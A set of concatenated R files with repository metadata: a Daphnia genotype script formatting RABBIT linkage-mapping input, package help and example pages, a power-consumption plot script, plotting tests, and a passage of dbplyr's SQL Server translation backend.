seqResetFilter(genofile)
seqSetFilter(genofile,
            sample.id=f1s$clone,
            variant.id=ac.inform$id)
# Per-variant missing rate across the selected F1 samples.
mr <- data.table(id=seqGetData(genofile, "variant.id"),
                mr=seqMissing(genofile))
mr <- merge(mr, snp.dt, by="id")
### check to see if missing rates are homogeneously distributed throughout the genome.
mr[,pos.bin:=round(pos/1e5)]
# Per 100 kb window: how many sites have <25% missing data, out of how many.
mr.ag <- mr[,list(nLow=sum(mr<.25), n=length(mr)), list(pos.bin)]
summary(mr.ag$nLow/mr.ag$n)
### trim out position bins with high rates of missing data (i.e., when nLow/n is high. mr=missing rate so a low is good; we want windows with a lot of sites with low missing rates, i.e. with y>.5)
#ggplot(data=mr.ag[nLow/n>.5], aes(y=nLow/n, x=pos.bin)) + geom_line()
### select windows with low rates of high missing rat ( 50% )
# Keep only windows where more than half the sites have low missingness.
setkey(ac.inform, pos.bin)
ac.inform <- ac.inform[J(mr.ag[nLow/n >.5]$pos.bin)]
### trim to sites with low rates of missing data
ac.inform <- merge(ac.inform, mr[,c("id", "mr"), with=F], by="id")
ac.inform <- ac.inform[mr<.25]
### subsample
ac.inform.ag <- ac.inform[,list(n=length(id)), list(pos.bin)]
# Subsample variant ids: return x unchanged when it already has at most n
# elements; otherwise draw a random subset of size n and return it as a
# sorted integer vector.  (Sampling goes through as.character/as.integer to
# keep the original behaviour, including the RNG stream, intact.)
sample.fun <- function(x, n) {
  if (length(x) <= n) {
    return(x)
  }
  sort(as.integer(sample(as.character(x), size = n)))
}
# Fixed seed so the subsample (and thus the RABBIT input) is reproducible.
set.seed(1234)
# Subsample up to 50,000 ids per 100 kb window, then keep only those rows.
ac.inform.sub <- ac.inform[,list(id=sample.fun(id, 50000)), list(pos.bin)]
setkey(ac.inform.sub, pos.bin, id)
setkey(ac.inform, pos.bin, id)
ac.inform <- merge(ac.inform, ac.inform.sub)
ac.inform[,list(n=length(id)), list(pos.bin)]
### make parents
# Parent rows for the RABBIT file: sample label followed by the hard
# genotype calls at every retained site.
A.parent <- c("A", ac.inform$A.geno)
C.parent <- c("C", ac.inform$C.geno)
head(A.parent)
head(C.parent)
parents <- rbind(A.parent, C.parent)
head(parents[,1:10])
### load & format offspring
seqResetFilter(genofile)
seqSetFilter(genofile,
            sample.id=f1s$clone,
            variant.id=ac.inform$id)
# Dosage matrix: one column per F1 clone, one row per variant.
genomat <- as.data.table(t(seqGetData(genofile, "$dosage")))
setnames(genomat, seqGetData(genofile, "sample.id"))
genomat[,id:=seqGetData(genofile, "variant.id")]
### check
# Sanity-check table: per-variant counts of each dosage class across F1s.
genomat.l <- melt(genomat, id.vars="id")
genomat.l.ag <- genomat.l[,list(n22=sum(value==0, na.rm=T), n12=sum(value==1, na.rm=T), n11=sum(value==2, na.rm=T)), list(id)]
gp <- merge(genomat.l.ag, ac.inform, by="id")
# One offspring row per F1 clone: recode dosages into RABBIT genotype codes
# (0 -> "2N", 1 -> "12", 2 -> "1N", missing -> "NN"), prefixed with the clone
# name.  .errorhandling="remove" silently drops clones that fail.
offspring <- foreach(ind.i=f1s$clone, .combine="rbind", .errorhandling="remove")%do%{
  tmp <- t(as.matrix(genomat[,ind.i, with=F]))
  tmp[tmp=="0"] <- "2N"
  #tmp[tmp=="1"] <- sample(c("1N","2N"), dim(tmp)[1], replace=T)
  tmp[tmp=="1"] <- "12"
  tmp[tmp=="2"] <- "1N"
  tmp[is.na(tmp)] <- "NN"
  cbind(matrix(ind.i, ncol=1), tmp)
}
dim(offspring)
offspring[1:5,1:10]
### make header
# Header rows for the RABBIT file: marker ids, a numeric chromosome code, and
# cM positions spread evenly from 0 to maxcM across the markers.
marker <- matrix(c("marker", seqGetData(genofile, "variant.id")), nrow=1)
#chr <- matrix(c("chromosome", rep(NA, dim(genomat)[1])), nrow=1)
#pos <- matrix(c("pos(cM)", rep(NA, dim(genomat)[1])), nrow=1)
chr <- matrix(c("chromosome", rep(as.numeric(as.factor(chr.i)), dim(marker)[2]-1)), nrow=1)
pos <- matrix(c("pos(cM)", seq(from=0, to=maxcM, length.out=dim(marker)[2]-1)), nrow=1)
header <- do.call("rbind", list(marker, chr, pos))
### combine
out <- do.call("rbind", list(header, parents, offspring))
rownames(out) <- NULL
out[1:7,1:4]
### write
out.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".all.in", sep="")
# First line declares the number of founders, then the table is appended.
writeLines( paste("#founders,",2, sep=""),
            con=out.fn
)
# Disable scientific notation so positions are written out in full.
options(scipen=999)
write.table(out,
            file=out.fn,
            quote=FALSE,
            row.names=FALSE,
            col.names=FALSE,
            sep=",",
            na="NA",
            append=TRUE)
### make ped file
ped.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".ped", sep="")
# Write the fixed pedigree header, then tag each F1 clone with its pedigree
# member id.  The "all" set has an extra pedigree member (4) for the selfed C
# clones; every other set uses the simple two-founder cross (member 3).
if(f1s.set!="all") {
  writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,2,0,0\n1,3,0,1,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
              con=ped.fn
  )
  f1s[,id:=3]
  f1s[,fc:="1-2"]
} else if(f1s.set=="all" ) {
  writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,0,0,0\n1,3,0,1,2\n1,4,0,2,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
              con=ped.fn
  )
  f1s[clone%in%sc[AxCF1Hybrid==1]$clone, id:=3]
  f1s[clone%in%sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone, id:=4]
  f1s[,fc:="1-2"]
}
# Append the per-clone rows (clone, member id, funnel code) below the header.
write.table(f1s,
            file=ped.fn,
            quote=FALSE,
            row.names=FALSE,
            col.names=FALSE,
            sep=",",
            na="NA",
            append=TRUE)
| /AlanAnalysis/rQTL/rabbit.format_input.consensus.dosage.R | no_license | kbkubow/DaphniaPulex20162017Sequencing | R | false | false | 8,502 | r | #module load intel/18.0 intelmpi/18.0 R/3.6.3; R
### makes rabbit input
args = commandArgs(trailingOnly=TRUE)
chr.i <- as.character(args[1])
maxcM <- as.numeric(args[2])
f1s.set <- as.character(args[3])
#chr.i <- "Scaffold_1863_HRSCAF_2081"; maxcM=10; f1s.set <- "all"
### libraries
library(data.table)
library(SeqArray)
library(foreach)
### set wd
setwd("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020")
### load SuperClone
sc <- fread("Superclones201617182019withObtusaandPulicaria_kingcorr_20200623_wmedrd.txt")
### which F1s?
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.onlyPheno.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.allF1s.delim")
#f1s <- fread("/scratch/aob2x/daphnia_hwe_sims/DaphniaPulex20162017Sequencing/AlanAnalysis/rQTL/F1s_to_use.all_AxC_F1s.delim")
if(f1s.set=="onlyPheno_AxC") {
f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==1]$clone
} else if (f1s.set=="wildF1s_AxC"){
f1s <- sc[AxCF1Hybrid==1][OneLiterPheno==0]$clone
} else if(f1s.set=="all_AxC") {
f1s <- sc[AxCF1Hybrid==1]$clone
} else if(f1s.set=="all_CxC") {
f1s <- sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone
} else if(f1s.set=="all") {
f1s <- c(sc[AxCF1Hybrid==1]$clone,
sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone)
}
f1s <- data.table(clone=f1s)
### open GDS
genofile <- seqOpen("/project/berglandlab/Karen/MappingDec2019/WithPulicaria/June2020/MapJune2020_ann.seq.gds", allow.duplicate=TRUE)
### load in filter file
snpFilter <- fread("snpsvarpulexpresentinhalf_table_20200623")
### make snp.dt
snp.dt <- data.table(chr=seqGetData(genofile, "chromosome"),
pos=seqGetData(genofile, "position"),
id=seqGetData(genofile, "variant.id"),
numAlleles=seqNumAllele(genofile),
key="chr")
setkey(snpFilter, chr, pos)
setkey(snp.dt, chr, pos)
snp.dt <- merge(snpFilter, snp.dt)
### make majority rule (consensus) genotype calls for
ac.fd <- foreach(sc.i=c("A", "C"), .combine="cbind")%do%{
seqResetFilter(genofile)
seqSetFilter(genofile, sample.id=sc[SC==sc.i]$clone, variant.id=snp.dt$id)
data.table(af=seqAlleleFreq(genofile, ref.allele=1L)) ### alternate allele
}
setnames(ac.fd, c(1,2), c("af.A", "af.C"))
ac.fd <- cbind(ac.fd, snp.dt)
ac.fd[!is.na(af.A),A.geno := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.C),C.geno := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) c("11","12","22")[which.min(abs(x-c(0,.5,1)))]))]
ac.fd[!is.na(af.A),A.delta := unlist(sapply(ac.fd[!is.na(af.A)]$af.A, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd[!is.na(af.C),C.delta := unlist(sapply(ac.fd[!is.na(af.C)]$af.C, function(x) min(abs(x-c(0,.5,1)))))]
ac.fd <- ac.fd[A.delta < 0.05 & C.delta < 0.05]
ac.inform <- ac.fd[(A.geno=="12" & C.geno=="11") |
(A.geno=="12" & C.geno=="22") |
(A.geno=="11" & C.geno=="12") |
(A.geno=="22" & C.geno=="12") |
(A.geno=="12" & C.geno=="12") |
(A.geno=="11" & C.geno=="22") |
(A.geno=="22" & C.geno=="11") ]
ac.inform <- ac.inform[chr==chr.i]
ac.inform[,pos.bin:=round(pos/1e5)]
### select sites in F1s with lowest amount of missing data
seqResetFilter(genofile)
seqSetFilter(genofile,
sample.id=f1s$clone,
variant.id=ac.inform$id)
mr <- data.table(id=seqGetData(genofile, "variant.id"),
mr=seqMissing(genofile))
mr <- merge(mr, snp.dt, by="id")
### check to see if missing rates are homogeneously distributed throughout the genome.
mr[,pos.bin:=round(pos/1e5)]
mr.ag <- mr[,list(nLow=sum(mr<.25), n=length(mr)), list(pos.bin)]
summary(mr.ag$nLow/mr.ag$n)
### trim out position bins with high rates of missing data (i.e., when nLow/n is high. mr=missing rate so a low is good; we want windows with a lot of sites with low missing rates, i.e. with y>.5)
#ggplot(data=mr.ag[nLow/n>.5], aes(y=nLow/n, x=pos.bin)) + geom_line()
### select windows with low rates of high missing rat ( 50% )
setkey(ac.inform, pos.bin)
ac.inform <- ac.inform[J(mr.ag[nLow/n >.5]$pos.bin)]
### trim to sites with low rates of missing data
ac.inform <- merge(ac.inform, mr[,c("id", "mr"), with=F], by="id")
ac.inform <- ac.inform[mr<.25]
### subsample
ac.inform.ag <- ac.inform[,list(n=length(id)), list(pos.bin)]
sample.fun <- function(x, n) {
if(length(x)<=n) return(x)
if(length(x)>n) return(sort(as.integer(sample(as.character(x), size=n))))
}
set.seed(1234)
ac.inform.sub <- ac.inform[,list(id=sample.fun(id, 50000)), list(pos.bin)]
setkey(ac.inform.sub, pos.bin, id)
setkey(ac.inform, pos.bin, id)
ac.inform <- merge(ac.inform, ac.inform.sub)
ac.inform[,list(n=length(id)), list(pos.bin)]
### make parents
A.parent <- c("A", ac.inform$A.geno)
C.parent <- c("C", ac.inform$C.geno)
head(A.parent)
head(C.parent)
parents <- rbind(A.parent, C.parent)
head(parents[,1:10])
### load & format offspring
seqResetFilter(genofile)
seqSetFilter(genofile,
sample.id=f1s$clone,
variant.id=ac.inform$id)
genomat <- as.data.table(t(seqGetData(genofile, "$dosage")))
setnames(genomat, seqGetData(genofile, "sample.id"))
genomat[,id:=seqGetData(genofile, "variant.id")]
### check
genomat.l <- melt(genomat, id.vars="id")
genomat.l.ag <- genomat.l[,list(n22=sum(value==0, na.rm=T), n12=sum(value==1, na.rm=T), n11=sum(value==2, na.rm=T)), list(id)]
gp <- merge(genomat.l.ag, ac.inform, by="id")
offspring <- foreach(ind.i=f1s$clone, .combine="rbind", .errorhandling="remove")%do%{
tmp <- t(as.matrix(genomat[,ind.i, with=F]))
tmp[tmp=="0"] <- "2N"
#tmp[tmp=="1"] <- sample(c("1N","2N"), dim(tmp)[1], replace=T)
tmp[tmp=="1"] <- "12"
tmp[tmp=="2"] <- "1N"
tmp[is.na(tmp)] <- "NN"
cbind(matrix(ind.i, ncol=1), tmp)
}
dim(offspring)
offspring[1:5,1:10]
### make header
marker <- matrix(c("marker", seqGetData(genofile, "variant.id")), nrow=1)
#chr <- matrix(c("chromosome", rep(NA, dim(genomat)[1])), nrow=1)
#pos <- matrix(c("pos(cM)", rep(NA, dim(genomat)[1])), nrow=1)
chr <- matrix(c("chromosome", rep(as.numeric(as.factor(chr.i)), dim(marker)[2]-1)), nrow=1)
pos <- matrix(c("pos(cM)", seq(from=0, to=maxcM, length.out=dim(marker)[2]-1)), nrow=1)
header <- do.call("rbind", list(marker, chr, pos))
### combine
out <- do.call("rbind", list(header, parents, offspring))
rownames(out) <- NULL
out[1:7,1:4]
### write
out.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".all.in", sep="")
writeLines( paste("#founders,",2, sep=""),
con=out.fn
)
options(scipen=999)
write.table(out,
file=out.fn,
quote=FALSE,
row.names=FALSE,
col.names=FALSE,
sep=",",
na="NA",
append=TRUE)
### make ped file
ped.fn <- paste("/scratch/aob2x/daphnia_hwe_sims/Rabbit_phase_", maxcM, "cm/", chr.i, "/", chr.i, ".ped", sep="")
if(f1s.set!="all") {
writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,2,0,0\n1,3,0,1,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
con=ped.fn
)
f1s[,id:=3]
f1s[,fc:="1-2"]
} else if(f1s.set=="all" ) {
writeLines( "Pedigree-Information,DesignPedigree\nGeneration,MemberID,Female=1/Male=2/Hermaphrodite=0,MotherID,FatherID\n0,1,1,0,0\n0,2,0,0,0\n1,3,0,1,2\n1,4,0,2,2\nPedigree-Information,SampleInfor\nProgenyLine,MemberID,Funnelcode",
con=ped.fn
)
f1s[clone%in%sc[AxCF1Hybrid==1]$clone, id:=3]
f1s[clone%in%sc[OneLiterPheno==1][AxCF1Hybrid==0][SC=="selfedC"]$clone, id:=4]
f1s[,fc:="1-2"]
}
write.table(f1s,
file=ped.fn,
quote=FALSE,
row.names=FALSE,
col.names=FALSE,
sep=",",
na="NA",
append=TRUE)
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/RcppExports.R
\name{vector_of_matrices}
\alias{vector_of_matrices}
\title{Computes elements S^n until the value size_vec}
\usage{
vector_of_matrices(the_vector, S, size_vec)
}
\arguments{
\item{the_vector}{A vector to save results.}
\item{S}{Sub-intensity matrix.}
\item{size_vec}{Size of vector.}
}
\value{
Modified vector with the elements S^n.
}
\description{
Computes elements S^n until the value size_vec
}
| /man/vector_of_matrices.Rd | permissive | jorgeyslas/phfrailty | R | false | true | 492 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/RcppExports.R
\name{vector_of_matrices}
\alias{vector_of_matrices}
\title{Computes elements S^n until the value size_vec}
\usage{
vector_of_matrices(the_vector, S, size_vec)
}
\arguments{
\item{the_vector}{A vector to save results.}
\item{S}{Sub-intensity matrix.}
\item{size_vec}{Size of vector.}
}
\value{
Modified vector with the elements S^n.
}
\description{
Computes elements S^n until the value size_vec
}
|
library(quantable)
### Name: simpleheatmap
### Title: heatmap2 facade
### Aliases: simpleheatmap
### ** Examples
tmp = matrix(rep((1:100),times = 4) + rnorm(100*4,0,3),ncol=4)
mean = c(20,30,10,40)
sd = c(4,3,4,5)
tmp = sweep(tmp,2,sd,"*")
tmp = sweep(tmp,2,mean,"+")
par(mar=c(5,5,5,5))
simpleheatmap(tmp,ColSideColors=c("red","blue","pink","black"))
simpleheatmap(tmp)
| /data/genthat_extracted_code/quantable/examples/simpleheatmap.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 378 | r | library(quantable)
### Name: simpleheatmap
### Title: heatmap2 facade
### Aliases: simpleheatmap
### ** Examples
tmp = matrix(rep((1:100),times = 4) + rnorm(100*4,0,3),ncol=4)
mean = c(20,30,10,40)
sd = c(4,3,4,5)
tmp = sweep(tmp,2,sd,"*")
tmp = sweep(tmp,2,mean,"+")
par(mar=c(5,5,5,5))
simpleheatmap(tmp,ColSideColors=c("red","blue","pink","black"))
simpleheatmap(tmp)
|
## Load the full household power consumption data set; "?" marks missing
## values in the raw file.
power_raw <- read.table(
  "household_power_consumption.txt",
  sep = ";", header = TRUE, na.strings = "?",
  stringsAsFactors = FALSE, dec = "."
)
## Keep only the two days of interest (1 Feb and 2 Feb 2007).
two_days <- power_raw[power_raw$Date %in% c("1/2/2007", "2/2/2007"), ]
## Combine the Date and Time columns into a single POSIXlt timestamp.
stamp <- strptime(
  paste(two_days$Date, two_days$Time, sep = " "),
  format = "%d/%m/%Y %H:%M:%S"
)
## Render the line plot straight to a 480x480 PNG file, then close the device.
png("plot2.png", width = 480, height = 480)
plot(stamp, two_days$Global_active_power,
     ylab = "Global Active Power (kilowatts)", xlab = "", type = "l")
dev.off()
| /plot2.R | no_license | Ig-Gamma/ExData_Plotting1 | R | false | false | 692 | r | ##reading the data from household_power_consumption.txt
DataPower<-read.table("household_power_consumption.txt", sep=";", header = TRUE, na.strings = "?", stringsAsFactors = FALSE, dec = ".")
## subsetting the data to the 1/2/2007 and 2/2/2007 periods
SubData<-DataPower[DataPower$Date %in% c("1/2/2007","2/2/2007"),]
# formatting Data and Time in one variable
DateAndTime<-strptime(paste(SubData$Date,SubData$Time, sep = " "), format="%d/%m/%Y %H:%M:%S")
#opening a graphic device
png("plot2.png", width = 480, height = 480)
#making graph and closing the graphic device
plot(DateAndTime,SubData$Global_active_power, ylab = "Global Active Power (kilowatts)", xlab="", type = "l")
dev.off()
|
\name{GPS}
\alias{GPS}
\docType{data}
\title{
\code{GPS}
}
\description{
WGS84 projection
}
\usage{data(GPS)}
\format{
The format is:
Formal class 'CRS' [package "sp"] with 1 slots
..@ projargs: chr "+init=epsg:4326 +proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs +towgs84=0,0,0"
}
\examples{
data(GPS)
str(GPS)
}
\keyword{datasets}
| /man/GPS.Rd | no_license | cran/geospacom | R | false | false | 344 | rd | \name{GPS}
\alias{GPS}
\docType{data}
\title{
\code{GPS}
}
\description{
WGS84 projection
}
\usage{data(GPS)}
\format{
The format is:
Formal class 'CRS' [package "sp"] with 1 slots
..@ projargs: chr "+init=epsg:4326 +proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs +towgs84=0,0,0"
}
\examples{
data(GPS)
str(GPS)
}
\keyword{datasets}
|
## Regression tests: greenhouse-gas value (GHGV) plots built from a
## single-site JSON fixture must render without raising errors.
library("ghgvcr")
library("ggplot2")
library("gridExtra")
library("jsonlite")
context("test that plots work without generating errors.")
# Fixture path is relative to tests/testthat/.
single_json_file <- "../data/single_site.json"
test_that("plots are generated without errors", {
# Round-trip the fixture through JSON so calc_ghgv sees canonical input.
eco <- fromJSON(single_json_file)
out_json <- calc_ghgv(toJSON(eco, auto_unbox = FALSE))
plot_data <- json_to_df(toJSON(fromJSON(out_json)$results))
p <- plot_ghgv(plot_data)
# Drawing the grob is the assertion-by-side-effect: it must not error.
grid.arrange(p)
expect_is(p, c('gtable', 'grob', 'gDesc'))
})
# NOTE(review): placeholder with an empty body -- always passes; either
# implement the ordering check or remove this test.
test_that("sites are ordered correctly", {
})
| /tests/testthat/test_plots.R | permissive | ebimodeling/ghgvcR | R | false | false | 543 | r | library("ghgvcr")
library("ggplot2")
library("gridExtra")
library("jsonlite")
context("test that plots work without generating errors.")
single_json_file <- "../data/single_site.json"
test_that("plots are generated without errors", {
eco <- fromJSON(single_json_file)
out_json <- calc_ghgv(toJSON(eco, auto_unbox = FALSE))
plot_data <- json_to_df(toJSON(fromJSON(out_json)$results))
p <- plot_ghgv(plot_data)
grid.arrange(p)
expect_is(p, c('gtable', 'grob', 'gDesc'))
})
test_that("sites are ordered correctly", {
})
|
#' @export
`sql_select.Microsoft SQL Server`<- function(con, select, from, where = NULL,
group_by = NULL, having = NULL,
order_by = NULL,
limit = NULL,
distinct = FALSE,
...) {
out <- vector("list", 7)
names(out) <- c("select", "from", "where", "group_by",
"having", "order_by","limit")
assert_that(is.character(select), length(select) > 0L)
out$select <- build_sql(
"SELECT ",
if (distinct) sql("DISTINCT "),
# MS SQL uses the TOP statement instead of LIMIT which is what SQL92 uses
# TOP is expected after DISTINCT and not at the end of the query
# e.g: SELECT TOP 100 * FROM my_table
if (!is.null(limit) && !identical(limit, Inf)) {
assert_that(is.numeric(limit), length(limit) == 1L, limit > 0)
build_sql("TOP(", as.integer(limit), ") ", con = con)
},
escape(select, collapse = ", ", con = con),
con = con
)
out$from <- sql_clause_from(from, con)
out$where <- sql_clause_where(where, con)
out$group_by <- sql_clause_group_by(group_by, con)
out$having <- sql_clause_having(having, con)
out$order_by <- sql_clause_order_by(order_by, con)
escape(unname(purrr::compact(out)), collapse = "\n", parens = FALSE, con = con)
}
#' @export
`sql_translate_env.Microsoft SQL Server` <- function(con) {
sql_variant(
sql_translator(.parent = base_odbc_scalar,
`!` = function(x) {
if (sql_current_select()) {
build_sql(sql("~"), list(x))
} else {
sql_expr(NOT(!!x))
}
},
`!=` = sql_infix("!="),
`==` = sql_infix("="),
`<` = sql_infix("<"),
`<=` = sql_infix("<="),
`>` = sql_infix(">"),
`>=` = sql_infix(">="),
`&` = mssql_generic_infix("&", "%AND%"),
`&&` = mssql_generic_infix("&", "%AND%"),
`|` = mssql_generic_infix("|", "%OR%"),
`||` = mssql_generic_infix("|", "%OR%"),
bitwShiftL = sql_not_supported("bitwShiftL"),
bitwShiftR = sql_not_supported("bitwShiftR"),
`if` = mssql_sql_if,
if_else = function(condition, true, false) mssql_sql_if(condition, true, false),
ifelse = function(test, yes, no) mssql_sql_if(test, yes, no),
as.numeric = sql_cast("NUMERIC"),
as.double = sql_cast("NUMERIC"),
as.character = sql_cast("VARCHAR(MAX)"),
log = sql_prefix("LOG"),
nchar = sql_prefix("LEN"),
atan2 = sql_prefix("ATN2"),
ceil = sql_prefix("CEILING"),
ceiling = sql_prefix("CEILING"),
# https://dba.stackexchange.com/questions/187090
pmin = sql_not_supported("pmin()"),
pmax = sql_not_supported("pmax()"),
substr = function(x, start, stop) {
len <- stop - start + 1
sql_expr(SUBSTRING(!!x, !!start, !!len))
},
is.null = function(x) mssql_is_null(x, sql_current_context()),
is.na = function(x) mssql_is_null(x, sql_current_context()),
# TRIM is not supported on MS SQL versions under 2017
# https://docs.microsoft.com/en-us/sql/t-sql/functions/trim-transact-sql
# Best solution is to nest a left and right trims.
trimws = function(x) {
sql_expr(LTRIM(RTRIM(!!x)))
},
# MSSQL supports CONCAT_WS in the CTP version of 2016
paste = sql_not_supported("paste()"),
# stringr functions
str_length = sql_prefix("LEN"),
str_locate = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string))
},
str_detect = function(string, pattern) {
sql_expr(CHARINDEX(!!pattern, !!string) > 0L)
}
),
sql_translator(.parent = base_odbc_agg,
sd = sql_aggregate("STDEV", "sd"),
var = sql_aggregate("VAR", "var"),
# MSSQL does not have function for: cor and cov
cor = sql_not_supported("cor()"),
cov = sql_not_supported("cov()")
),
sql_translator(.parent = base_odbc_win,
sd = win_aggregate("STDEV"),
var = win_aggregate("VAR"),
# MSSQL does not have function for: cor and cov
cor = win_absent("cor"),
cov = win_absent("cov")
)
)}
#' Collect optimizer statistics for a table (dbplyr db_analyze method for
#' SQL Server).  `...` is accepted for generic compatibility and ignored.
#' @export
`db_analyze.Microsoft SQL Server` <- function(con, table, ...) {
  # Using UPDATE STATISTICS instead of ANALYZE as recommended in this article
  # https://docs.microsoft.com/en-us/sql/t-sql/statements/update-statistics-transact-sql
  sql <- build_sql("UPDATE STATISTICS ", as.sql(table), con = con)
  DBI::dbExecute(con, sql)
}
# Normalize a table name for SQL Server temporary-table semantics.
# A temporary name without a leading "#" is rewritten to "##<name>" (global
# temp table) and the rewrite is reported via message(); every other name is
# returned untouched.
mssql_temp_name <- function(name, temporary) {
  needs_prefix <- temporary && !startsWith(name, "#")
  if (needs_prefix) {
    name <- paste0("##", name)
    message("Created a temporary table named: ", name)
  }
  name
}
#' @export
`db_save_query.Microsoft SQL Server` <- function(con, sql, name,
temporary = TRUE, ...){
name <- mssql_temp_name(name, temporary)
tt_sql <- build_sql(
"SELECT * INTO ", as.sql(name), " FROM (", sql, ") ", as.sql(name),
con = con
)
dbExecute(con, tt_sql)
name
}
#' Write a local data frame to SQL Server (dbplyr db_write_table method).
#' Temporary tables are renamed to the global "##" form by mssql_temp_name(),
#' which is why dbWriteTable itself is always called with temporary = FALSE.
#' Returns the (possibly rewritten) table name.
#' @export
`db_write_table.Microsoft SQL Server` <- function(con, table, types, values, temporary = TRUE, ...) {
  table <- mssql_temp_name(table, temporary)
  dbWriteTable(
    con,
    name = table,
    types = types,
    value = values,
    temporary = FALSE,
    row.names = FALSE
  )
  table
}
# `IS NULL` returns a boolean expression, so you can't use it in a result set
# the approach using casting return a bit, so you can use in a result set, but not in where.
# Microsoft documentation: The result of a comparison operator has the Boolean data type.
# This has three values: TRUE, FALSE, and UNKNOWN. Expressions that return a Boolean data type are
# known as Boolean expressions. Unlike other SQL Server data types, a Boolean data type cannot
# be specified as the data type of a table column or variable, and cannot be returned in a result set.
# https://docs.microsoft.com/en-us/sql/t-sql/language-elements/comparison-operators-transact-sql
# Translate is.null()/is.na() for SQL Server, where boolean expressions
# cannot appear in a result set (see the comment block above this function).
#
# @param x Quoted column/expression being tested.
# @param context Current SQL generation context; `context$clause` names the
#   clause currently being built.
# In SELECT/ORDER clauses emit CONVERT(BIT, IIF(x IS NULL, 1, 0)) so the
# result is a storable BIT; elsewhere (e.g. WHERE) plain `x IS NULL` is valid.
mssql_is_null <- function(x, context) {
  if (context$clause %in% c("SELECT", "ORDER")) {
    sql_expr(convert(BIT, iif(!!x %is% NULL, 1L, 0L)))
  } else {
    sql_is_null(x)
  }
}
# Build an infix translator whose emitted SQL operator depends on context:
# SQL Server needs the bitwise form (&, |) when the expression appears in
# SELECT output, but the logical form (AND, OR) in filtering clauses.
#
# @param if_select Operator emitted while generating a SELECT clause.
# @param if_filter Operator emitted everywhere else (e.g. WHERE).
# @return A two-argument translator function for the variant tables above.
mssql_generic_infix <- function(if_select, if_filter) {
  # force() so the returned closure captures evaluated values, not promises.
  force(if_select)
  force(if_filter)
  function(x, y) {
    if (sql_current_select()) {
      f <- if_select
    } else {
      f <- if_filter
    }
    sql_call2(f, x, y)
  }
}
# Translate `if` / `ifelse` / `if_else` for SQL Server.
# The condition is rendered under a neutral ("") clause context so the
# SELECT-clause boolean/BIT rewriting above does not apply to it; the
# previous context is restored on exit via on.exit().
mssql_sql_if <- function(cond, if_true, if_false = NULL) {
  old <- set_current_context(list(clause = ""))
  on.exit(set_current_context(old), add = TRUE)
  cond <- build_sql(cond)
  sql_if(cond, if_true, if_false)
}
globalVariables(c("BIT", "%is%", "convert", "iif", "NOT", "SUBSTRING", "LTRIM", "RTRIM", "CHARINDEX"))
| /R/backend-mssql.R | permissive | machow/dbplyr | R | false | false | 7,594 | r | #' @export
`sql_select.Microsoft SQL Server`<- function(con, select, from, where = NULL,
group_by = NULL, having = NULL,
order_by = NULL,
limit = NULL,
distinct = FALSE,
...) {
out <- vector("list", 7)
names(out) <- c("select", "from", "where", "group_by",
"having", "order_by","limit")
assert_that(is.character(select), length(select) > 0L)
out$select <- build_sql(
"SELECT ",
if (distinct) sql("DISTINCT "),
# MS SQL uses the TOP statement instead of LIMIT which is what SQL92 uses
# TOP is expected after DISTINCT and not at the end of the query
# e.g: SELECT TOP 100 * FROM my_table
if (!is.null(limit) && !identical(limit, Inf)) {
assert_that(is.numeric(limit), length(limit) == 1L, limit > 0)
build_sql("TOP(", as.integer(limit), ") ", con = con)
},
escape(select, collapse = ", ", con = con),
con = con
)
out$from <- sql_clause_from(from, con)
out$where <- sql_clause_where(where, con)
out$group_by <- sql_clause_group_by(group_by, con)
out$having <- sql_clause_having(having, con)
out$order_by <- sql_clause_order_by(order_by, con)
escape(unname(purrr::compact(out)), collapse = "\n", parens = FALSE, con = con)
}
#' @export
`sql_translate_env.Microsoft SQL Server` <- function(con) {
sql_variant(
sql_translator(.parent = base_odbc_scalar,
`!` = function(x) {
if (sql_current_select()) {
build_sql(sql("~"), list(x))
} else {
sql_expr(NOT(!!x))
}
},
`!=` = sql_infix("!="),
`==` = sql_infix("="),
`<` = sql_infix("<"),
`<=` = sql_infix("<="),
`>` = sql_infix(">"),
`>=` = sql_infix(">="),
`&` = mssql_generic_infix("&", "%AND%"),
`&&` = mssql_generic_infix("&", "%AND%"),
`|` = mssql_generic_infix("|", "%OR%"),
`||` = mssql_generic_infix("|", "%OR%"),
bitwShiftL = sql_not_supported("bitwShiftL"),
bitwShiftR = sql_not_supported("bitwShiftR"),
`if` = mssql_sql_if,
if_else = function(condition, true, false) mssql_sql_if(condition, true, false),
